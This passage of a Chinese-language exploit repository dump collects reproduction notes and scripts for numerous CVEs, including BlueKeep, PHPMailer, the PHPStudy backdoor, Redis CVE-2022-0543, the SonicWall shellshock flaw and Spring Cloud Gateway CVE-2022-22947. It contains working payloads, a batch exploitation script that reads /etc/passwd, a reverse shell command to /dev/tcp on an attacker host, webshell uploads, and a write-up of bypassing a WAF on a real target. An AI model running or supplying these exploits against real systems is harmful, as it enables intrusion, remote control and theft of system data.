| # 0x02 环境搭建 9 | 靶机环境:2008_r2_standard_zh-chs 10 | 11 | 前提条件: 12 | 2008_r2_standard_zh-chs修改注册表值项HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam的值为1 13 | (有的文章指出要修改的注册表值项为HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal\Server\WinStations\rdpwd\fDisableCam,但我的系统没有值项rdpwd,而在项RDP-Tcp下有值项fDisableCam) 14 | 15 | # 0x03 利用条件 16 | Windows Server 2008 R2需要修改注册表 17 | Windows Server 2008(还没尝试,但应该和Windows Server 2008 R2一样) 18 | Windows 7无利用条件 19 | 20 | # 0x04 影响版本 21 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) 22 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 23 | Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 24 | Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) 25 | Windows Server 2008 for x64-based Systems Service Pack 2 26 | Windows Server 2008 for Itanium-Based Systems Service Pack 2 27 | Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) 28 | Windows Server 2008 for 32-bit Systems Service Pack 2 29 | Windows 7 for x64-based Systems Service Pack 1 30 | Windows 7 for 32-bit Systems Service Pack 1 31 | 32 | # 0x05 漏洞复现 33 | 攻击环境:kali_x64_en-us 34 | 35 | 将如下3个文件替换msf中默认的文件 36 | cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/ 37 | cp ./rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/(有的文章中给出的目录是/usr/share/metasploit-framework/modules/auxiliary/scanner/,我想应该是少写了rdp/) 38 | cp ./cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/ 39 | 将如下1个文件添加到msf中 40 | cp ./cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/ 41 | 监听meterpreter: 42 | msfconsole 43 | search 0708 44 | use windows/rdp/cve_2019_0708_bluekeep_rce 45 | set RHOSTS 192.168.149.130 46 | run 47 | 选择目标为3(vmware) 48 | 49 | 共尝试了4次: 50 | 第一次没修改注册表,系统蓝屏 51 | 第二次修改注册表后,成功拿到shell 52 | 第三次修改注册表后,系统蓝屏 53 | 第四次修改注册表后,报错Connection reset by peer 54 | 结论,08 r2需要修改注册表,而且利用不稳定 55 | 56 | # 0x06 踩坑记录 57 | 坑0:Exploit aborted due to failure: bad-config: Set the most appropriate target manually 58 | 表示需要设置对应的目标 59 | 坑1:Exploit failed: NameError undefined local variable or method 60 | 需要额外修改三个文件 61 | 坑2:Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer 62 | 未知 63 | 64 | # 0x07 参考链接 65 | https://github.com/rapid7/metasploit-framework/pull/12283 66 | http://blog.xkkhh.cn/archives/535 67 | -------------------------------------------------------------------------------- /Microsoft/Microsoft SharePoint漏洞集合.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-0604 2 | ``` 3 | 工具地址:https://github.com/k8gege/CVE-2019-0604 4 | ``` -------------------------------------------------------------------------------- /Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/document.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/document.docx -------------------------------------------------------------------------------- /Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/pic/1.png -------------------------------------------------------------------------------- /Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/readme.md: -------------------------------------------------------------------------------- 1 | 首先需要关闭Windows Defender(会被查杀) 2 | 3 | Win10_Pro_1703_x64_zh-cn + MS Office 2013 4 | 5 | 执行document.docx两次后会弹出计算器,如下图 6 | ![image](./pic/1.png) 7 | 8 | 参考链接: 9 | https://github.com/lockedbyte/CVE-2021-40444 10 | https://weixin.sogou.com/weixin?type=2&query=CVE-2021-40444&ie=utf8&s_from=input&_sug_=n&_sug_type_= 11 | -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/0.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/1.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/2.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/3.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/4.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/5.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/a.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /PHPMailer/PHPMailer远程命令执行漏洞(CVE-2016-10033)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHPMailer/PHPMailer远程命令执行漏洞(CVE-2016-10033)/0.png -------------------------------------------------------------------------------- /PHPMailer/PHPMailer远程命令执行漏洞(CVE-2016-10033)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://www.mozhe.cn/bug/detail/124 3 | 4 | # 0x01 利用条件 5 | 无 6 | 7 | # 0x02 影响版本 8 | PHPMailer<5.2.18 9 | 10 | # 0x03 漏洞复现 11 | 启动墨者学院的靶场环境,看到一个网站,点击底部的“Mail Contact”,进入“http://219.153.49.228:49754/mail.php” 12 | 在name处随便输入比如“aaa”,在email处输入: 13 | ``` 14 | "aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com 15 | ``` 16 | 在message处输入一句话木马: 17 | ``` 18 | 19 | ``` 20 | 蚁剑链接http://219.153.49.228:49754/a.php ,成功拿到webshell,如下图 21 | ![image](./0.png) 22 | 23 | # 0x04 踩坑记录 24 | 坑1:上传完一句话木马后,页面会响应3-5分钟,响应时间较长 25 | 26 | # 参考链接 27 | https://www.jianshu.com/p/745c82d8b6e0 28 | -------------------------------------------------------------------------------- /PHPStudy/PHPStudy后门漏洞(暂无编号)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHPStudy/PHPStudy后门漏洞(暂无编号)/0.png -------------------------------------------------------------------------------- /PHPStudy/PHPStudy后门漏洞(暂无编号)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHPStudy/PHPStudy后门漏洞(暂无编号)/1.png -------------------------------------------------------------------------------- /PHPStudy/PHPStudy后门漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | phpstudy:流行的php集成部署环境 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:phpstudy 2018 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:2008_r2_standard_zh-chs 10 | 11 | 后门代码存在于phpstudy 2016和phpstudy 2018自带的php-5.2.17、php-5.4.45中的\ext\php_xmlrpc.dll模块中,用记事本打开此文件,查找“@eval”,若文件存在“@eval(%s('%s'));”则存在后门,如下图 12 | ![image](./0.png) 13 | 下载并安装phpstudy 2018,按照提示下一步即可 14 | 15 | # 0x03 利用条件 16 | 无 17 | 18 | # 0x04 影响版本 19 | phpstudy 2016和phpstudy 2018自带的php-5.2.17、php-5.4.45 20 | 21 | # 0x05 漏洞复现 22 | 攻击环境:kali_x64_en-us 23 | 24 | burp抓包,请求头中添加字段:Accept-Charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 25 | 上述字符串是“echo system("net user");”base64编码后的字符串,结果如下图 26 | ![image](./1.png) 27 | 需要注意,发送的数据包头部中:Accept-Enconding:gzio, deflate有一处问题,deflate与前面的逗号之间有一个空格,需要手动删除,不然无法成功执行命令 28 | 29 | # 0x06 踩坑记录 30 | 无 31 | 32 | # 0x07 参考链接 33 | 无 34 | 35 | # 注意 36 | 我当时寻找有漏洞的版本花了好多时间,现将我寻找到有效版本分享给大家,漏洞环境大于25MB,不能上传到github中,使用百度云分享 37 | phpstudy2016分享,提取码:ybdt,链接:https://pan.baidu.com/s/1-dX55n6xT5hNcBYkxicOBg 38 | phpstudy2018分享,提取码:ybdt,链接:https://pan.baidu.com/s/1bLX53txLZx4NQAwTsM4BQA 39 | -------------------------------------------------------------------------------- /PHPUnit/PHPUnit远程代码执行漏洞(CVE-2017-9841)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHPUnit/PHPUnit远程代码执行漏洞(CVE-2017-9841)/0.png -------------------------------------------------------------------------------- /PHPUnit/PHPUnit远程代码执行漏洞(CVE-2017-9841)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHPUnit/PHPUnit远程代码执行漏洞(CVE-2017-9841)/1.png -------------------------------------------------------------------------------- /PHPUnit/PHPUnit远程代码执行漏洞(CVE-2017-9841)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | PHPUnit:一款php下软件测试常用的框架 3 | 4 | # 0x01 复现环境 5 | 使用环境:vulhub中的环境 6 | 复现版本:PHPUnit 5.6.2 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:Ubuntu 18.04.5 LTS 10 | 11 | cd ./vulhub-master/ 12 | cd ./phpunit/ 13 | cd ./CVE-2017-9841/ 14 | docker-compose build 15 | docker-compose up -d 16 | 17 | # 0x03 利用条件 18 | 使用composer安装受影响版本的PHPUnit 19 | 20 | # 0x04 影响版本 21 | 4.8.19 <= PHPUnit <= 4.8.27 22 | 5.0.10 <= PHPUnit <= 5.6.2 23 | 24 | # 0x05 漏洞复现 25 | 攻击环境:kali_x64_en-us 26 | 27 | 访问http://ybdt.best:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 28 | 直接在请求中添加 29 | ``` 30 | 31 | ``` 32 | 如下图 33 | ![image](./0.png) 34 | 结果如下 35 | ![image](./1.png) 36 | 37 | # 0x06 踩坑记录 38 | 坑1: 39 | 在本地搭建环境,网络可能会非常非常慢,建议找一台云服务器 40 | 41 | # 0x07 参考链接 42 | 无 43 | -------------------------------------------------------------------------------- /PHP内置服务器/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHP内置服务器/01.png -------------------------------------------------------------------------------- /PHP内置服务器/PHP源码读取漏洞复现.md: -------------------------------------------------------------------------------- 1 | 先说下对这个漏洞的基本理解,由php内置的web服务器的漏洞,引发的源码读取漏洞 2 | 3 | 复现过程 4 | ``` 5 | 安装phpstudy,但不能使用nginx或apache作为web服务器,切换到php所在目录后执行如下命令,我这里以php7.4.3为例: 6 | 7 | php.exe -S 0.0.0.0:6677 -n -t C:\phpstudy_pro\WWW 8 | 9 | 使用burp抓包,需要修改两处,可以参见这里:https://www.freebuf.com/vuls/359359.html 10 | 11 | 结果复现失败 12 | 13 | 看了其他文章,猜测可能是是web根目录下的index.html导致的,创建一个新的目录后,重启启动 14 | 15 | php.exe -S 0.0.0.0:6677 -n -t C:\phpstudy_pro\WWW\test 16 | 17 | burp下重新发包,可读取到源码 18 | ``` 19 | 20 | 成功读取到源码 21 | ![image](./01.png) -------------------------------------------------------------------------------- /README.assets/awvs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/README.assets/awvs.png -------------------------------------------------------------------------------- /README.assets/goby.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/README.assets/goby.png -------------------------------------------------------------------------------- /README.assets/xray.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/README.assets/xray.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 很久之前打了一次AWD,让我萌生了将常见漏洞都打一遍的想法 2 | 3 | # 免责声明 4 | 本项目中所有POC/EXP仅用于学习研究,不可用作恶意攻击! 5 | 6 | # V1.0 7 | 漏洞复现 + 批量检测工具 8 | 9 | # V2.0 10 | 漏洞复现 + 批量检测工具 + 漏洞武器化 + 批量利用工具 11 | 12 | # V3.0 13 | 漏洞复现 + 批量检测工具 + 漏洞武器化 + 批量利用工具 + 漏洞分析 -------------------------------------------------------------------------------- /Redis/Redis RCE复现及简单分析(CVE-2022-0543)/pic/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Redis/Redis RCE复现及简单分析(CVE-2022-0543)/pic/01.png -------------------------------------------------------------------------------- /Redis/Redis RCE复现及简单分析(CVE-2022-0543)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x01 原理浅析 2 | Debian及其衍生版打包Redis时,在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象中的loadlib函数来加载动态链接库liblua5.1.so.0中的导出函数luaopen_io,执行这个导出函数获得io库,最后使用其执行命令,作者提到不同系统下liblua5.1.so.0的路径可能不同,所以需要在本地对照一下,,,吐槽一句,不能打红帽系有点鸡肋了...... 3 | 4 | # 0x02 先决条件 5 | 01 未授权访问或拿到账号密码 6 | 02 目标为Debian及其衍生版 7 | 8 | # 0x03 漏洞复现 9 | 使用p牛的vulhub搭建环境:https://github.com/vulhub/vulhub/tree/master/redis/CVE-2022-0543 10 | 搭建好的环境是redis 5.0.7,且存在未授权访问 11 | 执行如下payload 12 | ``` 13 | eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0 14 | 15 | eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("uname -a", "r"); local res = f:read("*a"); f:close(); return res' 0 16 | ``` 17 | ![image](./pic/01.png) 18 | 19 | # 0x04 参考文章 20 | https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce 21 | https://github.com/vulhub/vulhub/tree/master/redis/CVE-2022-0543 -------------------------------------------------------------------------------- /SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/0.png -------------------------------------------------------------------------------- /SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/1.png -------------------------------------------------------------------------------- /SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/batch-detect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | ''' 4 | Author: ybdt 5 | Date: 2021/01/27 6 | ''' 7 | 8 | import sys 9 | import requests 10 | import platform 11 | 12 | def execute_command(target, command): 13 | url = target + "/cgi-bin/jarrewrite.sh" 14 | headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)} 15 | try : 16 | r = requests.get(url=url, headers=headers, verify=False) 17 | except: 18 | return ""; 19 | return r.text 20 | 21 | def check_exploitable(target): 22 | #print( "(+) Testing %s for pwnability..." % (target) ); 23 | output = execute_command(target=target, command="cat /etc/passwd"); 24 | if "root:" in output: 25 | return True; 26 | else: 27 | return False; 28 | 29 | def main(): 30 | if len(sys.argv) != 2: 31 | sys.exit("Usage: python3 batch-detect.py urls.txt"); 32 | else: 33 | file = sys.argv[1]; 34 | 35 | with open(file, "r") as f: 36 | lines = f.readlines(); 37 | for line in lines: 38 | if platform.system() == "Windows": 39 | line = line.strip("\r\n"); 40 | elif platform.system() == "Linux": 41 | line = line.strip("\n"); 42 | is_vulnerable = check_exploitable("https://" + line); 43 | if is_vulnerable: 44 | print("http://" + line + " is vulnerable"); 45 | else: 46 | print("http://" + line + " is not vulnerable"); 47 | 48 | main(); -------------------------------------------------------------------------------- /SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | SonicWall:一款VPN解决方案,包含WEB界面、VPN功能等 3 | 4 | # 0x01 复现环境 5 | 复现环境:公司实验室 6 | 复现版本:SonicWall 7 | 环境搭建: 8 | 略 9 | 10 | # 0x02 利用条件 11 | 无 12 | 13 | # 0x03 影响版本 14 | SonicWall SSL-VPN < 8.0.0.4 15 | 16 | # 0x04 漏洞复现 17 | 攻击环境:kali x64 18 | 访问目标,burp抓包,将访问地址修改为 19 | ``` 20 | /cgi-bin/jarrewrite.sh 21 | ``` 22 | 将User-Agent修改为 23 | ``` 24 | User-Agent: () { :; }; echo ; /bin/bash -c 'cat /etc/passwd' 25 | ``` 26 | 成功执行命令,如下图 27 | ![image](./0.png) 28 | 29 | # 0x05 批量脚本 30 | 批量脚本见batch-detect.py(脚本很简陋,正在写脚本时,领导分配了一个渗透任务,实在没时间了。。),执行结果如下: 31 | ![image](./1.png) 32 | 33 | # 0x06 参考链接 34 | https://github.com/darrenmartyn/VisualDoor/blob/main/visualdoor.py 35 | -------------------------------------------------------------------------------- /SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/urls.txt: -------------------------------------------------------------------------------- 1 | www.example.com:8080 2 | 1.1.1.1:8090 3 | -------------------------------------------------------------------------------- /Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/cve-2022-22947.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | import requests, json, sys, base64 5 | 6 | 7 | #proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} 8 | 9 | 10 | def rce(url, cmd): 11 | h1 = { 12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', 13 | 'Content-Type': 'application/json' 14 | } 15 | data = { 16 | "id": "ee", 17 | "filters": [{ 18 | "name": "AddResponseHeader", 19 | "args": { 20 | "name": "Result", 21 | "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"" + cmd +"\").getInputStream()))}" 22 | } 23 | }], 24 | "uri": "http://aaaa.aa", 25 | "order": 0 26 | } 27 | 28 | res1 = requests.post('{}/actuator/gateway/routes/ee'.format(url), data = json.dumps(data, ensure_ascii = False), headers = h1, verify = False)#, proxies = proxies) 29 | res2 = requests.post('{}/actuator/gateway/refresh'.format(url), headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',}, verify = False) 30 | res3 = requests.get('{}/actuator/gateway/routes/ee'.format(url), headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',}, verify = False) 31 | print(res3.text) 32 | 33 | 34 | if __name__ == "__main__": 35 | if len(sys.argv) != 3: 36 | print('使用: python cve-2022-22947.py url cmd') 37 | sys.exit(1) 38 | 39 | url = sys.argv[-2] 40 | if url[-1] == '/': 41 | url = url[:-1] 42 | 43 | cmd = sys.argv[-1] 44 | cmd = 'bash -c {echo,' + base64.b64encode(cmd.encode()).decode() + '}|{base64,-d}|{bash,-i}' 45 | if not (url.startswith('http://') or url.startswith('https://')): 46 | print('使用: python cve-2022-22947.py url cmd') 47 | sys.exit(1) 48 | 49 | rce(url, cmd) -------------------------------------------------------------------------------- /Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/image/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/image/01.png -------------------------------------------------------------------------------- /Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/image/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/image/02.png -------------------------------------------------------------------------------- /Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/readme.md: -------------------------------------------------------------------------------- 1 | # 影响版本 2 | Spring Cloud Gateway 3 | 3.1.0 4 | 3.0.0 to 3.0.6 5 | Older, unsupported versions are also affected 6 | 7 | # 攻击环境 8 | 复现环境:https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947 9 | 复现版本:Spring Cloud Gateway 3.1.0 10 | 11 | # 攻击过程 12 | 环境搭建好以后,vps开启监听 13 | ![image](./image/01.png) 14 | 执行命令 15 | ``` 16 | python3.exe .\cve-2022-22947.py http://192.168.16.142:8080/ "bash -c 'exec bash -i &>/dev/tcp/xx.xx.xx.xx/1234 <&1'" 17 | ``` 18 | vps上成功收到反连 19 | ![image](./image/02.png) 20 | 21 | # 需要注意 22 | 一开始可以执行命令,过几分钟后会出现卡死状况 -------------------------------------------------------------------------------- /Spring/Spring Core RCE 0day漏洞复现/pic/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Spring/Spring Core RCE 0day漏洞复现/pic/01.png -------------------------------------------------------------------------------- /Spring/Spring Core RCE 0day漏洞复现/pic/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Spring/Spring Core RCE 0day漏洞复现/pic/02.png -------------------------------------------------------------------------------- /Spring/Spring Core RCE 0day漏洞复现/pic/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Spring/Spring Core RCE 0day漏洞复现/pic/03.png -------------------------------------------------------------------------------- /Spring/Spring Core RCE 0day漏洞复现/readme.md: -------------------------------------------------------------------------------- 1 | # 0x01-环境搭建 2 | 借助白帽汇的开源项目vulfocus,地址:https://github.com/fofapro/vulfocus 3 | 4 | docker pull及其他问题可参考:https://github.com/ybdt/front-hub/tree/main/18-Docker 5 | 6 | 搭建好后如下图 7 | ![image](./pic/01.png) 8 | 9 | # 0x02-漏洞复现 10 | 使用项目:https://github.com/BobTheShoplifter/Spring4Shell-POC 11 | ``` 12 | git clone https://github.com/BobTheShoplifter/Spring4Shell-POC.git 13 | 14 | python3.exe .\poc.py --url http://127.0.0.1:8080 15 | ``` 16 | 执行攻击代码,如下图 17 | ![image](./pic/02.png) 18 | 19 | 浏览器访问,如下图 20 | ![image](./pic/03.png) -------------------------------------------------------------------------------- /Struts2/Struts2 S2-045远程代码执行漏洞(CVE-2017-5638)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Struts2/Struts2 S2-045远程代码执行漏洞(CVE-2017-5638)/pic/1.png -------------------------------------------------------------------------------- /Struts2/Struts2 S2-045远程代码执行漏洞(CVE-2017-5638)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Struts2/Struts2 S2-045远程代码执行漏洞(CVE-2017-5638)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x01 打点发现 2 | 队友整理出目标全部OA系统的地址及指纹共7个,包含致远、泛微、等 3 | 对这7个OA系统进行漏洞检测,发现不存在Nday漏洞 4 | 用nmap对这7个OA系统所在ip进行全端口扫描,依次审查每个端口信息,发现其中一个端口支持put、delete方法,比较可疑,使用浏览器访问后发现是.action后缀,怀疑存在struts2漏洞 5 | # 0x02 漏洞验证 6 | 使用struts2漏洞检测工具检测,发现存在s2-045漏洞,尝试执行命令,发现返回connection reset,应该是有waf 7 | # 0x03 防护绕过 8 | 现在有2个思路,要么绕过执行命令的限制,要么上传webshell,先尝试难度相对小一些的上传webshell 9 | 尝试上传jsp格式的webshell,访问后发现403 10 | 尝试上传txt格式的文件,上传后能访问,说明可以上传文件 11 | 猜测,之前的403是因为,目标的web服务器做了限制,不能访问jsp文件 12 | 13 | 随后是一系列尝试: 14 | 上传.action格式的文件会返回到首页 15 | 上传随意后缀不能解析 16 | 当上传jspx格式的webshell时能访问,哥斯拉成功连接,如下图 17 | ![image](./pic/1.png) 18 | -------------------------------------------------------------------------------- /Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/0.png -------------------------------------------------------------------------------- /Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/1.png -------------------------------------------------------------------------------- /Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/2.png -------------------------------------------------------------------------------- /Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/3.png -------------------------------------------------------------------------------- /Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/4.png -------------------------------------------------------------------------------- /Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/5.png -------------------------------------------------------------------------------- /Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/6.png: -------------------------------------------------------------------------------- 